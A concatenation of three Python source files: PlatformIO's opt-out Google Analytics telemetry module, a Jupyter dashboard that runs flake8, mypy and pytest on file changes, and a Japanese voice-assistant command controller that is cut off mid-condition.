class MeasurementProtocol(TelemetryBase):
TID = "UA-1768265-9"
PARAMS_MAP = {
"screen_name": "cd",
"event_category": "ec",
"event_action": "ea",
"event_label": "el",
"event_value": "ev",
}
def __init__(self):
super(MeasurementProtocol, self).__init__()
self["v"] = 1
self["tid"] = self.TID
self["cid"] = app.get_cid()
try:
self["sr"] = "%dx%d" % click.get_terminal_size()
except ValueError:
pass
self._prefill_screen_name()
self._prefill_appinfo()
self._prefill_sysargs()
self._prefill_custom_data()
def __getitem__(self, name):
if name in self.PARAMS_MAP:
name = self.PARAMS_MAP[name]
return super(MeasurementProtocol, self).__getitem__(name)
def __setitem__(self, name, value):
if name in self.PARAMS_MAP:
name = self.PARAMS_MAP[name]
super(MeasurementProtocol, self).__setitem__(name, value)
def _prefill_appinfo(self):
self["av"] = __version__
self["an"] = app.get_user_agent()
def _prefill_sysargs(self):
args = []
for arg in sys.argv[1:]:
arg = str(arg)
if arg == "account": # ignore account cmd which can contain username
return
if any(("@" in arg, "/" in arg, "\\" in arg)):
arg = "***"
args.append(arg.lower())
self["cd3"] = " ".join(args)
def _prefill_custom_data(self):
def _filter_args(items):
result = []
stop = False
for item in items:
item = str(item).lower()
result.append(item)
if stop:
break
if item == "account":
stop = True
return result
caller_id = str(app.get_session_var("caller_id"))
self["cd1"] = util.get_systype()
self["cd4"] = (
1 if (not util.is_ci() and (caller_id or not is_container())) else 0
)
if caller_id:
self["cd5"] = caller_id.lower()
def _prefill_screen_name(self):
def _first_arg_from_list(args_, list_):
for _arg in args_:
if _arg in list_:
return _arg
return None
args = []
for arg in PlatformioCLI.leftover_args:
if not isinstance(arg, string_types):
arg = str(arg)
if not arg.startswith("-"):
args.append(arg.lower())
if not args:
return
cmd_path = args[:1]
if args[0] in (
"account",
"device",
"platform",
"package",
"project",
"settings",
"system",
):
cmd_path = args[:2]
if args[0] == "lib" and len(args) > 1:
lib_subcmds = (
"builtin",
"install",
"list",
"register",
"search",
"show",
"stats",
"uninstall",
"update",
)
sub_cmd = _first_arg_from_list(args[1:], lib_subcmds)
if sub_cmd:
cmd_path.append(sub_cmd)
elif args[0] == "remote" and len(args) > 1:
remote_subcmds = ("agent", "device", "run", "test")
sub_cmd = _first_arg_from_list(args[1:], remote_subcmds)
if sub_cmd:
cmd_path.append(sub_cmd)
if len(args) > 2 and sub_cmd in ("agent", "device"):
remote2_subcmds = ("list", "start", "monitor")
sub_cmd = _first_arg_from_list(args[2:], remote2_subcmds)
if sub_cmd:
cmd_path.append(sub_cmd)
self["screen_name"] = " ".join([p.title() for p in cmd_path])
def _ignore_hit(self):
if not app.get_setting("enable_telemetry"):
return True
if all(c in sys.argv for c in ("run", "idedata")) or self["ea"] == "Idedata":
return True
return False
def send(self, hittype):
if self._ignore_hit():
return
self["t"] = hittype
# correct queue time
if "qt" in self._params and isinstance(self["qt"], float):
self["qt"] = int((time() - self["qt"]) * 1000)
MPDataPusher().push(self._params)
@util.singleton
class MPDataPusher(object):
MAX_WORKERS = 5
def __init__(self):
self._queue = queue.LifoQueue()
self._failedque = deque()
self._http_session = requests.Session()
self._http_offline = False
self._workers = []
def push(self, item):
# if network is off-line
if self._http_offline:
if "qt" not in item:
item["qt"] = time()
self._failedque.append(item)
return
self._queue.put(item)
self._tune_workers()
def in_wait(self):
return self._queue.unfinished_tasks
def get_items(self):
items = list(self._failedque)
try:
while True:
items.append(self._queue.get_nowait())
except queue.Empty:
pass
return items
def _tune_workers(self):
for i, w in enumerate(self._workers):
if not w.is_alive():
del self._workers[i]
need_nums = min(self._queue.qsize(), self.MAX_WORKERS)
active_nums = len(self._workers)
if need_nums <= active_nums:
return
for i in range(need_nums - active_nums):
t = threading.Thread(target=self._worker)
t.daemon = True
t.start()
self._workers.append(t)
def _worker(self):
while True:
try:
item = self._queue.get()
_item = item.copy()
if "qt" not in _item:
_item["qt"] = time()
self._failedque.append(_item)
if self._send_data(item):
self._failedque.remove(_item)
self._queue.task_done()
except: # pylint: disable=W0702
pass
def _send_data(self, data):
if self._http_offline:
return False
try:
r = self._http_session.post(
"https://ssl.google-analytics.com/collect",
data=data,
headers={"User-Agent": app.get_user_agent()},
timeout=1,
)
r.raise_for_status()
return True
except requests.exceptions.HTTPError as e:
# skip Bad Request
if 400 >= e.response.status_code < 500:
return True
except: # pylint: disable=W0702
pass
self._http_offline = True
return False
def on_command():
resend_backuped_reports()
mp = MeasurementProtocol()
mp.send("screenview")
if is_ci():
measure_ci()
def on_exception(e):
skip_conditions = [
isinstance(e, cls)
for cls in (IOError, exception.ReturnErrorCode, exception.UserSideException,)
]
if any(skip_conditions):
return
is_fatal = any(
[
not isinstance(e, exception.PlatformioException),
"Error" in e.__class__.__name__,
]
)
description = "%s: %s" % (
type(e).__name__,
" ".join(reversed(format_exc().split("\n"))) if is_fatal else str(e),
)
send_exception(description, is_fatal)
def measure_ci():
event = {"category": "CI", "action": "NoName", "label": None}
known_cis = (
"GITHUB_ACTIONS",
"TRAVIS",
"APPVEYOR",
"GITLAB_CI",
"CIRCLECI",
"SHIPPABLE",
"DRONE",
)
for name in known_cis:
if os.getenv(name, "false").lower() == "true":
event["action"] = name
break
send_event(**event)
def dump_run_environment(options):
non_sensitive_data = [
"platform",
"platform_packages",
"framework",
"board",
"upload_protocol",
"check_tool",
"debug_tool",
"monitor_filters",
]
safe_options = {k: v for k, v in options.items() if k in non_sensitive_data}
if is_platformio_project(os.getcwd()):
phash = hashlib.sha1(hashlib_encode_data(app.get_cid()))
safe_options["pid"] = phash.hexdigest()
return json.dumps(safe_options, sort_keys=True, ensure_ascii=False)
def send_run_environment(options, targets):
send_event(
"Env",
" ".join([t.title() for t in targets or ["run"]]),
dump_run_environment(options),
)
def send_event(category, action, label=None, value=None, screen_name=None):
mp = MeasurementProtocol()
mp["event_category"] = category[:150]
mp["event_action"] = action[:500]
if label:
mp["event_label"] = label[:500]
if value:
mp["event_value"] = int(value)
if screen_name:
mp["screen_name"] = screen_name[:2048]
mp.send("event")
def send_exception(description, is_fatal=False):
# cleanup sensitive information, such as paths
description = description.replace("Traceback (most recent call last):", "")
description = description.replace("\\", "/")
description = re.sub(
r'(^|\s+|")(?:[a-z]\:)?((/[^"/]+)+)(\s+|"|$)',
lambda m: " %s " % os.path.join(*m.group(2).split("/")[-2:]),
description,
re.I | re.M,
)
description = re.sub(r"\s+", " ", description, flags=re.M)
mp = MeasurementProtocol()
mp["exd"] = description[:8192].strip()
mp["exf"] = 1 if is_fatal else 0
mp.send("exception")
@atexit.register
def _finalize():
timeout = 1000 # msec
elapsed = 0
try:
while elapsed < timeout:
if not MPDataPusher().in_wait():
break
sleep(0.2)
elapsed += 200
backup_reports(MPDataPusher().get_items())
except KeyboardInterrupt:
pass
def backup_reports(items):
if not items:
return
KEEP_MAX_REPORTS = 100
tm = app.get_state_item("telemetry", {})
if "backup" not in tm:
tm["backup"] = []
for params in items:
# skip static options
for key in list(params.keys()):
if key in ("v", "tid", "cid", "cd1", "cd2", "sr", "an"):
del params[key]
# store time in UNIX format
if "qt" not in params:
params["qt"] = time()
elif not isinstance(params["qt"], float):
params["qt"] = time() - (params["qt"] / 1000)
tm["backup"].append(params)
tm["backup"] = tm["backup"][KEEP_MAX_REPORTS * -1 :]
app.set_state_item("telemetry", tm)
def resend_backuped_reports():
tm = app.get_state_item("telemetry", {})
if "backup" not in tm or not tm["backup"]:
return False
for report in tm["backup"]:
mp = MeasurementProtocol()
for key, value in report.items():
mp[key] = value
mp.send(report["t"])
# clean
tm["backup"] = []
app.set_state_item("telemetry", tm)
return True
|
__init__.py | from abc import ABC, abstractmethod
from hashlib import md5
import io
from itertools import chain
import logging as lg
from pathlib import Path
import re
from subprocess import run, PIPE, STDOUT, Popen
from threading import Lock, Thread
from typing import * # noqa
from IPython.display import display
from ipywidgets import HTML, Accordion, HBox, VBox, Widget, Layout, IntProgress,\
Output, Button
from watchdog.events import PatternMatchingEventHandler, FileSystemEvent
from watchdog.observers import Observer
LOG = lg.getLogger(__name__)
def _event_path(event: FileSystemEvent) -> Path:
return Path(event.src_path)
def _hash(path: Path) -> bytes:
try:
return md5(path.read_bytes()).digest()
except IOError:
return b""
Update = Callable[[Path], None]
class Tracker(PatternMatchingEventHandler):
def __init__(self, update: Update) -> None:
super().__init__(
patterns=["*.py", "*.yml", "*.ini", "*.toml", "*.cfg", "*.json", ".flake8"],
ignore_patterns=[
"**/.ipynb_checkpoints/*",
".~*",
"**/__pycache__/*",
"*.pyc",
"*.pyd",
"**/.mypy_cache/**/*"
],
ignore_directories=False
)
self._update = update
self.hashes: Dict[Path, bytes] = {}
def on_created(self, event: FileSystemEvent) -> None:
p = _event_path(event)
LOG.debug(f"Created {p}")
if p.is_file():
self._run_update_on_distinct_hash(p, _hash(p))
def on_deleted(self, event: FileSystemEvent) -> None:
p = _event_path(event)
LOG.debug(f"Deleted {p}")
self._run_update_on_distinct_hash(p, b"")
def on_moved(self, event: FileSystemEvent) -> None:
s = Path(event.src_path)
d = Path(event.dest_path)
LOG.debug(f"Moved {s} to {d}")
if d.is_file():
self._run_update_on_distinct_hash(s, b"")
self._run_update_on_distinct_hash(d, _hash(d))
def on_modified(self, event: FileSystemEvent) -> None:
p = _event_path(event)
LOG.debug(f"Modified {p}")
if p.is_file():
self._run_update_on_distinct_hash(p, _hash(p))
def _run_update_on_distinct_hash(self, path: Path, h: bytes) -> None:
if h != self.hashes.get(path):
self.hashes[path] = h
LOG.info(f"Update {path}")
self._update(path)
class Checker(ABC):
def __init__(self):
super().__init__
self.ui = self.init_ui()
self._lock = Lock()
self._thread_ = None
def _ipython_display_(self) -> None:
display(self.ui)
@abstractmethod
def init_ui(self) -> Widget:
...
def update(self) -> None:
with self._lock:
if self._thread_ is None or not self._thread_.is_alive():
self._thread_ = Thread(target=self._update)
self._thread_.start()
@abstractmethod
def _update(self) -> None:
...
@abstractmethod
def clear(self) -> None:
...
class TrafficLight(HTML):
TEMPLATE = '<span style="font-size: xx-large;">{}</style>'
LIGHTS = {
"green": "🟢",
"red": "🔴",
"yellow": "🟡",
"white": "⚪"
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.update_value("white")
def update_value(self, color: str) -> None:
self.value = TrafficLight.TEMPLATE.format(TrafficLight.LIGHTS[color])
def green(self) -> None:
self.update_value("green")
def yellow(self) -> None:
self.update_value("yellow")
def red(self) -> None:
self.update_value("red")
Issue = Tuple[str, str, str, List[str], str]
class CheckerLinewise(Checker):
def init_ui(self) -> None:
self.trafficlight = TrafficLight(layout=Layout(width="0.5in"))
self.issues = HTML(value="")
self.container = Accordion(children=[self.issues])
self.container.set_title(0, "Yet to update")
self.container.selected_index = None
return HBox(children=[self.trafficlight, self.container])
@property
@abstractmethod
def title(self) -> str:
...
@property
@abstractmethod
def command(self) -> List[str]:
...
@abstractmethod
def iter_issues(self, stdout: str) -> Iterator[Issue]:
...
def _update(self) -> None:
self.trafficlight.yellow()
cp = run(self.command, stdout=PIPE, stderr=STDOUT, encoding="utf-8")
rows_issues = []
for path, lineno, column, issue, oops in self.iter_issues(cp.stdout):
row = ""
if issue:
row = (
f'<td class="db-cell">{path}</td>'
f'<td class="db-cell db-cell-alt at-right"">{lineno}</td>'
f'<td class="db-cell at-right">{column}</td>'
f'<td class="db-cell db-cell-alt">'
f'{"".join(f"<div>{x}</div>" for x in issue)}'
'</td>'
)
elif oops:
row = f"<td colspan=4>{oops.strip()}</td>"
if row:
rows_issues.append(f'<tr>{row}</tr>')
self.issues.value = (
'<table cellspacing="0">'
'<style>'
'.at-right {'
'text-align: right;'
'}'
'.db-cell {'
'padding: 0pt 4pt 0pt 4pt;'
'}'
'.db-cell-alt {'
'background: #dc8787;'
'}'
'</style>'
'<thead>'
'<tr>'
'<th><div class="db-cell">File</div></th>'
'<th><div class="db-cell db-cell-alt at-right">Line</div></th>'
'<th><div class="db-cell at-right">Column</div></th>'
'<th><div class="db-cell db-cell-alt">Issue</div></th>'
'</tr>'
'</thead>'
'<tbody>'
f"{''.join(rows_issues)}"
'</tbody>'
"</table>"
)
if rows_issues:
self.trafficlight.red()
self.container.set_title(0, f"{self.title}: {len(rows_issues)} issues")
self.container.selected_index = 0
else:
self.trafficlight.green()
self.container.set_title(0, f"{self.title}: all good!")
self.container.selected_index = None
def clear(self) -> None:
self.trafficlight.white()
class Flake8(CheckerLinewise):
@property
def command(self) -> List[str]:
return ["flake8"]
@property
def title(self) -> str:
return "PEP8 compliance"
def iter_issues(self, stdout: str) -> Iterator[Issue]:
for line in stdout.split("\n"):
try:
path, lineno, column, issue = line.split(":", maxsplit=3)
issue = issue.strip()
if any([path, lineno, column, issue]):
yield (path, lineno, column, [issue], "")
except ValueError:
line = line.strip()
if line:
yield ("", "", "", [], line)
class MyPy(CheckerLinewise):
@property
def command(self) -> List[str]:
return ["mypy", "--ignore-missing-imports", "--show-column-numbers", "."]
@property
def title(self) -> str:
return "Type coherence"
def iter_issues(self, stdout: str) -> Iterator[Issue]:
path = ""
lineno = ""
column = ""
lines_issue: List[str] = []
for line in stdout.split("\n"):
if line.startswith("Found "):
continue
elif "error:" in line:
if path:
yield (path, lineno, column, lines_issue, "")
head, tail = line.split("error:")
lines_issue = [tail.strip()]
parts_head = head.split(":")
while len(parts_head) < 3:
parts_head.append("")
path, lineno, column = [part.strip() for part in parts_head[:3]]
elif ": " in line:
parts = line.split(": ")
lines_issue.append(parts[-1].strip())
else:
if path:
yield (path, lineno, column, lines_issue, "")
path = ""
if line:
yield ("", "", "", [], line)
if path:
yield (path, lineno, column, lines_issue, "")
class Pytest(Checker):
def init_ui(self) -> Widget:
self.progress = IntProgress(
value=0,
max=100,
description="<strong>Unit tests</strong>",
bar_style="info"
)
self.failures = Accordion(children=[])
return VBox(children=[self.progress, self.failures])
def clear(self) -> None:
self.progress.value = 0
def _update(self) -> None:
pytest = Popen(
["pytest", "-vv", "--color=yes", "--no-header"],
encoding="utf-8",
stdout=PIPE,
stderr=STDOUT
)
fails = self._track_progress(cast(io.TextIOBase, pytest.stdout))
if fails:
self._capture_failures(cast(io.TextIOBase, pytest.stdout), fails)
else:
self.failures.children = [HTML(value="")]
self.failures.set_title(0, "All tests passed")
pytest.communicate()
def _track_progress(self, stdout: io.TextIOBase) -> List[str]:
self.progress.value = 0
self.progress.bar_style = "success"
self.failures.children = [
HTML(value="Failures will be reported once pytest terminates.")
]
self.failures.set_title(0, "Running pytest")
self.failures.selected_index = None
fails: List[str] = []
_expect_line(stdout, prefix="====", suffix="====", substr="test session starts")
_expect_line(stdout, prefix="collecting")
_expect_empty(stdout)
for line in stdout:
line = deansi(line.strip())
if not line:
break
self.progress.value = int(line[-5:-2].strip())
if "FAILED" in line:
self.progress.bar_style = "danger"
test, *_ = line.split()
fails.append(test)
return fails
def _capture_failures(self, stdout: Iterator[str], fails: List[str]) -> None:
_expect_line(stdout, prefix="====", suffix="====", substr="FAILURES")
children_new: List[Widget] = []
for i, test in enumerate(fails):
path_test, name_test = test.split("::")
_expect_line(stdout, prefix="____", suffix="____", substr=name_test)
_expect_empty(stdout)
self.failures.set_title(i, f"{name_test} in {path_test}")
out = Output()
for line in stdout:
line_no_code = deansi(line).strip()
if any(
line_no_code.startswith(sep * 8) and line_no_code.endswith(sep * 8)
for sep in ["_", "="]
):
# Found the header to the next failure or to the final summary.
stdout = chain([line], cast(Iterator[str], stdout))
break
out.append_stdout(line)
children_new.append(out)
self.failures.children = children_new
self.failures.selected_index = 0
def deansi(s: str) -> str:
return re.sub("\x1b\\[.+?m", "", s)
def _expect_line(
stdout: Iterator[str],
prefix: str = "",
suffix: str = "",
substr: str = ""
) -> None:
line = deansi(next(stdout).rstrip())
if not line.startswith(prefix):
raise ValueError(f"Line [{line[:-1]}] does not start with prefix [{prefix}]")
if not line.endswith(suffix):
raise ValueError(f"Line [{line[:-1]}] does not end with suffix [{suffix}]")
if substr not in line:
raise ValueError(f"Line [{line[:-1]}] does not contain substring [{substr}]")
def _expect_empty(stdout) -> None:
line = next(stdout).strip()
if line:
raise ValueError(f"Line [{line[:-1]}] is not empty as expected.")
class Dashboard:
def __init__(self, dir_project: Union[Path, str] = ""):
self._checkers = [Flake8(), MyPy(), Pytest()]
self._button_auto = Button(description="Auto", button_style="")
self._button_auto.on_click(self.on_auto)
self._button_run_now = Button(description="Run checks now")
self._button_run_now.on_click(self.on_run_now)
self._ui = VBox(
children=[
HBox(children=[self._button_auto, self._button_run_now]),
*[ch.ui for ch in self._checkers]
]
)
tracker = Tracker(self.on_file_changed)
self._observer = Observer()
self._observer.schedule(
tracker,
Path(dir_project or Path.cwd()),
recursive=True
)
self._observer.start()
def _ipython_display_(self) -> None:
display(self._ui)
def on_auto(self, _) -> None:
if self._button_auto.button_style:
self._button_auto.button_style = ""
else:
self._button_auto.button_style = "info"
def on_run_now(self, _) -> None:
self._update_checkers()
def on_file_changed(self, path: Path) -> None:
if self._button_auto.button_style:
self._update_checkers()
def _update_checkers(self) -> None:
for checker in self._checkers:
checker.update()
|
_speech_a3__allinone.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import shutil
import queue
import threading
import subprocess
import datetime
import time
import codecs
import glob
import platform
qOS = platform.system().lower() #windows,darwin,linux
print(os.path.dirname(__file__))
print(os.path.basename(__file__))
print(sys.version_info)
qApiInp = 'free'
qApiTrn = 'free'
qApiOut = 'free'
if (qOS == 'windows'):
qApiOut = 'winos'
if (qOS == 'darwin'):
qApiOut = 'macos'
qLangInp = 'ja'
qLangTrn = 'en'
qLangTxt = qLangInp
qLangOut = qLangTrn[:2]
qPathCtrl = 'temp/a3_0control/'
qPathInp = 'temp/a3_1voice/'
qPathWav = 'temp/a3_2stt_wav/'
qPathSTT = 'temp/a3_3stt_txt/'
qPathTTS = 'temp/a3_5tts_txt/'
qPathTRA = 'temp/a3_6tra_txt/'
qPathPlay = 'temp/a3_7play_voice/'
qPathRec = 'temp/a3_8recorder/'
qPathWork = 'temp/a3_9work/'
qBusyCtrl = qPathWork + 'busy_speechctl.txt'
qBusyInput = qPathWork + 'busy_voice2wav.txt'
qBusySTT = qPathWork + 'busy_sttcore.txt'
qBusyTTS = qPathWork + 'busy_ttscore.txt'
qBusyPlay = qPathWork + 'busy_playvoice.txt'
qCtrlBgm = 'temp/temp_bgm_control.txt'
qCtrlWeb = 'temp/temp_web_control.txt'
qCtrlChatting = 'temp/temp_chatting.txt'
qCtrlKnowledge = 'temp/temp_knowledge.txt'
qCtrlVision = 'temp/temp_vision.txt'
qCtrlRecognize = 'temp/temp_recognize.txt'
qCtrlTranslate = 'temp/temp_translate.txt'
def qBusySet(file, sw=True):
if (sw == True):
chktime = time.time()
while (not os.path.exists(file)) and ((time.time() - chktime) < 1):
try:
w = open(file, 'w')
w.write('BUSY')
w.close()
w = None
except:
w = None
time.sleep(0.10)
else:
chktime = time.time()
while (os.path.exists(file)) and ((time.time() - chktime) < 1):
try:
os.remove(file)
except:
pass
time.sleep(0.10)
def qBusyCheck(file, sec):
chktime = time.time()
while (os.path.exists(file)) and ((time.time() - chktime) < sec):
time.sleep(0.10)
if (os.path.exists(file)):
return 'busy'
else:
return 'none'
def qMakeDirs(pPath, pRemove=False):
#try:
if (len(pPath) > 0):
path=pPath.replace('\\', '/')
if (path[-1:] != '/'):
path += '/'
if (not os.path.isdir(path[:-1])):
os.makedirs(path[:-1])
else:
if (pRemove == True):
files = glob.glob(path + '*')
for f in files:
try:
os.remove(f)
except:
pass
#except:
#pass
qLogNow=datetime.datetime.now()
qLogFlie = 'temp/_log/' + qLogNow.strftime('%Y%m%d-%H%M%S') + '_' + os.path.basename(__file__) + '.log'
def qLogOutput(pLogText='', pDisplay=True, pOutfile=True):
#try:
if (pDisplay == True):
print(str(pLogText))
if (pOutfile == True):
w = codecs.open(qLogFlie, 'a', 'utf-8')
w.write(str(pLogText) + '\n')
w.close()
w = None
#except:
#pass
qMakeDirs('temp/_log/', False)
qLogOutput(qLogFlie, True, True)
def qGuide(tempFile=None, sync=True):
if (tempFile == '_up'):
tempFile = '_sound_up.mp3'
if (tempFile == '_ready'):
tempFile = '_sound_ready.mp3'
if (tempFile == '_accept'):
tempFile = '_sound_accept.mp3'
if (tempFile == '_ok'):
tempFile = '_sound_ok.mp3'
if (tempFile == '_ng'):
tempFile = '_sound_ng.mp3'
if (tempFile == '_down'):
tempFile = '_sound_down.mp3'
if (tempFile == '_shutter'):
tempFile = '_sound_shutter.mp3'
if (os.path.exists(tempFile)):
sox=subprocess.Popen(['sox', '-q', tempFile, '-d', ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
if (sync == True):
sox.wait()
sox.terminate()
sox = None
def control_speech(seq, fileId, runMode, micDev, useApiTrn, useApiOut, inpLang, outLang, speechtext, sync=True):
global qPathPlay
global qPathWork
global qBusyPlay
xrunMode = runMode
xApiInp = qApiInp
xApiTrn = useApiTrn
xApiOut = useApiOut
xLangInp = inpLang
xLangTrn = outLang
xLangTxt = inpLang
xLangOut = outLang
#while qBusyCheck(qBusyPlay , 0) == 'busy':
# qLogOutput('wait')
# time.sleep(1)
if (True):
now=datetime.datetime.now()
stamp=now.strftime('%Y%m%d-%H%M%S')
wrkText = qPathWork + stamp + '.' + seq + '.control.txt'
wrkOut = qPathPlay + stamp + '.' + seq + '.control.mp3'
try:
w = codecs.open(wrkText, 'w', 'utf-8')
w.write(speechtext)
w.close()
w = None
except:
w = None
if (True):
inpInput = ''
inpOutput= ''
trnInput = ''
trnOutput= ''
txtInput = wrkText
txtOutput= wrkOut
outInput = ''
outOutput= ''
inpPlay = 'off'
txtPlay = 'off'
outPlay = 'off'
if (True):
api = subprocess.Popen(['python', '_speech_a3_all_api.py', \
xrunMode, micDev, xApiInp, xApiTrn, xApiOut, xLangInp, xLangTrn, xLangTxt, xLangOut, \
str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput, txtInput, txtOutput, outInput, outOutput, \
inpPlay, txtPlay, outPlay, ], \
)
if (sync == True):
api.wait()
api.terminate()
api = None
locked_ai = False
bgm_control = None
web_control = None
chatting_control = None
knowledge_control = None
vision_control = None
def control_sub(seq, fileId, runMode, micDev, cmdtxt, cmdLang, ):
global qOS
global qApiInp
global qApiTrn
global qApiOut
global qLangInp
global qLangTrn
global qLangTxt
global qLangOut
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global qCtrlBgm
global qCtrlWeb
global qCtrlChatting
global qCtrlKnowledge
global qCtrlVision
global locked_ai
global bgm_control
global web_control
global chatting_control
global knowledge_control
global vision_control
cmdtxt=cmdtxt.lower()
procText = cmdtxt
cmdBgm = ''
cmdWeb = ''
cmdChatting = ''
cmdKnowledge = ''
cmdVision = ''
if (runMode=='speech') or (runMode=='number'):
procText = ''
if (runMode=='translator') or (runMode=='learning'):
procText = ''
if (runMode=='knowledge'):
procText = ''
#if (runMode=='debug') or (runMode=='handsfree'):
if (procText != ''):
if (cmdLang == 'ja'):
if (procText == 'default' or procText == 'by default') \
or (procText == 'special') \
or (procText == 'google') \
or (procText == 'ibm') or (procText == 'watson') \
or (procText == 'microsoft' or procText == 'google' or procText == 'azur') \
or (procText == 'nict') or (procText == 'n i c t') \
or (procText == 'contest') or (procText == 'contests') \
or (procText == 'contesting possession') \
or (procText == 'presentation') \
or (procText == 'docomo') \
or (procText == 'winos') or (procText == 'windows') \
or (procText == 'macos') or (procText == 'osx') \
or (procText == 'audio stop') or (procText == 'voice stop') \
or (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation') \
or (procText == 'ai list') or (procText == 'api list') \
or (procText == 'ai test') or (procText == 'api test'):
procText = ''
if (procText == u'システム終了' or procText == u'バルス'):
cmdBgm = '_close_'
cmdWeb = '_close_'
cmdChatting = '_close_'
cmdKnowledge = '_close_'
cmdVision = '_close_'
if (cmdLang == 'en'):
if ((procText.find('play' )>=0) and (procText.find('list' )>=0)) \
or ((procText.find('play' )>=0) and (procText.find('start')>=0)) \
or ((procText.find('playlist' )>=0) and (procText.find('start')>=0)) \
or ((procText.find('play list')>=0) and (procText.find('start')>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('start')>=0)) \
or (procText == 'bgm') \
or (procText == 'garageband') \
or (procText == 'babymetal') \
or (procText == 'perfume') \
or (procText == 'kyary pamyu pamyu') \
or (procText == 'one ok rock' or procText == 'one ok') \
or (procText == 'the end of the world' or procText == 'end of the world'):
cmdBgm = '_open_'
if ((procText.find('playlist') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('close')>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('exit' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('close')>=0)) \
or ((procText.find('play list')>=0) and (procText.find('exit' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('close')>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('exit' )>=0)):
cmdBgm = '_close_'
if ((procText.find('browser')>=0) and (procText.find('start')>=0)) \
or (procText == 'browser') \
or (procText == 'web browser') \
or (procText == 'periscope'):
cmdWeb = '_open_'
if ((procText.find('browser')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('browser')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('browser')>=0) and (procText.find('close')>=0)) \
or ((procText.find('browser')>=0) and (procText.find('exit' )>=0)):
cmdWeb = '_close_'
if ((procText.find('chat')>=0) and (procText.find('start')>=0)) \
or (procText == 'chat'):
cmdChatting = '_open_'
if ((procText.find('chat')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('chat')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('chat')>=0) and (procText.find('close')>=0)) \
or ((procText.find('chat')>=0) and (procText.find('exit' )>=0)):
cmdChatting = '_close_'
if ((procText.find('knowledge')>=0) and (procText.find('start')>=0)) \
or (procText == 'knowledge') \
or (procText == 'knowledge database'):
cmdKnowledge = '_open_'
if ((procText.find('knowledge')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('close')>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('exit' )>=0)):
cmdKnowledge = '_close_'
if ((procText.find('image') >=0) and (procText.find('start')>=0)) \
or ((procText.find('vision')>=0) and (procText.find('start')>=0)) \
or (procText == 'image') \
or (procText == 'image control') \
or (procText == 'vision') \
or (procText == 'vision control'):
cmdVision = '_open_'
if ((procText.find('shutter')>=0) or (procText.find('photo')>=0)):
cmdVision = '_shutter_'
if ((procText == 'zoom') or (procText == 'zoom in')):
cmdVision = '_zoom_in_'
if ((procText == 'zoom out') or (procText == 'zoom off')):
cmdVision = '_zoom_out_'
if ((procText.find('image') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('image') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('image') >=0) and (procText.find('close')>=0)) \
or ((procText.find('image') >=0) and (procText.find('exit' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('close')>=0)) \
or ((procText.find('vision')>=0) and (procText.find('exit' )>=0)):
cmdVision = '_close_'
if (procText == 'reset'):
cmdBgm = '_close_'
cmdWeb = '_close_'
cmdChatting = '_close_'
cmdKnowledge = '_close_'
cmdVision = '_close_'
if (cmdBgm != '') \
or (cmdWeb != '') \
or (cmdChatting != '') \
or (cmdKnowledge != '') \
or (cmdVision != '') \
or (procText == 'default' or procText == 'by default') \
or (procText == 'special') \
or (procText == 'google') \
or (procText == 'ibm') or (procText == 'watson') \
or (procText == 'microsoft' or procText == 'google' or procText == 'azur') \
or (procText == 'nict') or (procText == 'n i c t') \
or (procText == 'contest') or (procText == 'contests') \
or (procText == 'contesting possession') \
or (procText == 'presentation') \
or (procText == 'docomo') \
or (procText == 'winos') or (procText == 'windows') \
or (procText == 'macos') or (procText == 'osx') \
or (procText == 'audio stop') or (procText == 'voice stop') \
or (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation') \
or (procText == 'ai list') or (procText == 'api list') \
or (procText == 'ai test') or (procText == 'api test') \
or (procText == u'言語は何ですか') or (procText == u'何語ですか') \
or (procText == u'日本語' and qLangOut != 'ja') \
or (procText == u'英語' and qLangOut != 'en') \
or (procText == u'アラビア語' and qLangOut != 'ar') \
or (procText == u'スペイン語' and qLangOut != 'es') \
or (procText == u'ドイツ語' and qLangOut != 'de') \
or (procText == u'フランス語' and qLangOut != 'fr') \
or (procText == u'イタリア語' and qLangOut != 'it') \
or (procText == u'ポルトガル語' and qLangOut != 'pt') \
or (procText == u'ロシア語' and qLangOut != 'ru') \
or (procText == u'トルコ語' and qLangOut != 'tr') \
or (procText == u'ウクライナ語' and qLangOut != 'uk') \
or (procText == u'インドネシア語' and qLangOut != 'id') \
or (procText == u'ミャンマー語' and qLangOut != 'my') \
or (procText == u'タイ語' and qLangOut != 'th') \
or (procText == u'ベトナム語' and qLangOut != 'vi') \
or (procText == u'中国語' and qLangOut != 'zh') \
or (procText == u'韓国語' and qLangOut != 'ko') \
or (procText == u'デモ紹介') or (procText == u'デモンストレーション') \
or (procText == u'自己紹介') or (procText == u'自己診断') \
